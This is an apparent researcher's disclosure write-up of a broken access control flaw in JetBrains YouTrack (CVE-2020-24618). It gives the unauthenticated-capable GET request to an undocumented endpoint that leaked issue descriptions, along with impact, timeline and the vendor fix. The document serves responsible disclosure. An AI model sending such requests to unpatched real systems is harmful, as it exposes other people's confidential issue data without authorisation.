How I found a primitive but critical broken access control vulnerability in YouTrack (CVE-2020–24618)
Here is a story about how I found a primitive but critical vulnerability in JetBrains YouTrack.
Description
Details: CVE-2020–24618, Exploit
I was inspecting YouTrack internals and found one REST API endpoint that was unmentioned in the official documentation.The endpoint allowed to return an issue description/details without Markdown markup. I did a few Authn/Authz tests, which exposed that role validation was missing, so an unprivileged user could retrieve any issue details.
Request:GET /rest/issue/JT-12345/descriptionWithRemovedMarkup HTTP/1.1
Host: youtrack.jetbrains.com
User-Agent: {UserAgent}
Accept: */*
Accept-Encoding: gzip, deflate
Connection: closeResponse:HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Aug 2020 12:59:50 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 2784
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Location
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: YTSESSIONID=node01qnahqilj5weh3tfrk4z0d1v9075794.node0; Path=/; Secure; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, no-transform, must-revalidate
Strict-Transport-Security: max-age=31536000;
%ISSUE DETAILS%
I did a PoC and reported this issue to the YouTrack team almost immediately.
The report contained a simple HTTP GET request which exposed a description of another unpatched security issue I’ve reported before.
They took this vulnerability extremely seriously — assigned “show-stopper” priority and fixed it in less than an hour.
Impact
This vulnerability could allow an attacker to obtain all the issue descriptions in the application. Things are getting worse when the guest account is enabled — an attacker could get all this info even without authorization. Due to the nature of the application, the issues could contain sensitive information such as credentials, information intended for internal use, or a description of unpatched security issues. Fortunately, issue comments or attached files weren’t exposed or affected in any way.
Timeline
13 Aug 2020 16:07 : reported through the bug tracking system
13 Aug 2020 16:31 : vendor confirmed the vulnerability and assigned a priority.
13 Aug 2020 16:51 : state changed to “in-progress”.
13 Aug 2020 17:03 : patch released by the vendor.
16 Nov 2020 11:15 : public release of advisory.
After a few months, JetBrains released a security bulletin, and there was only one critical-severity issue (guess which one). Moreover, it was the second critical finding across all the reported vulnerabilities in JetBrains products for an entire 2020 year.
The funny thing is that the issue was estimated as medium severity by the CVSS3.1 score. And the reason for that is “Privileges Required” metric is LOW (PR:L), which is, in fact, generally correct but not always the case. (you can exploit it without authentication when the guest user account is enabled)
Mitigation:
JetBrains team added checks for issue READ permission, which is approximately one line of code. For the later versions of the YouTrack, they made this functionality deprecated and deleted it at all.
{
"error": "Deprecated REST API is disabled"
"error_description": "https://blog.jetbrains.com/youtrack/2021/02/discontinuing-the-legacy-rest-api-action-required"
}That’s it. I hope you liked this. Any questions? DM @ saninyurii
